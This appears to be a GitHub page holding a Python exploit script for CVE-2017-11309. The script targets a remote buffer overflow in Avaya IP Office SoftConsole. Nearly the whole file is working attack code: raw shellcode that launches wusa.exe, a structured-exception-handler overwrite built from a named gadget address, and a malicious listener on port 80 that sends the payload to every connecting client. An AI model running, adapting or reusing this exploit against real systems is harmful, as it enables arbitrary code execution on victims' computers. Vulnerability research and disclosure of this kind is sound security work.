-
Notifications
You must be signed in to change notification settings - Fork 4
/
CVE-2017-11309.py
59 lines (44 loc) · 1.67 KB
/
CVE-2017-11309.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import struct,socket
#AVAYA OFFICE IP (IPO) v9.1.0-10.1 SOFT CONSOLE REMOTE BUFFER OVERFLOW 0DAY
#CVE-2017-11309
#ASA-2017-307
#hyp3rlinx
#Log data, item 8
# Address=50E083A1
# Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)
#50E083A1 #POP ECX POP EBP RET
'''
No SafeSEH
'''
HOST="127.0.0.1"
PORT=80
#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")
seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+"BBBBRRRR"+"A"*232 #control SEH here
#(gdb) p/x -112
#$1 = 0xffffff90
negjmp="\xeb\x90\xff\xff"
payload="A"*452+"\x90"*10+sc+"A"*5+negjmp+seh+"\x90"*226
s = socket.socket()
host = ''
s.bind((HOST, PORT))
s.listen(5)
print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
print 'KABOOM!!!'
conn.close()
s.close()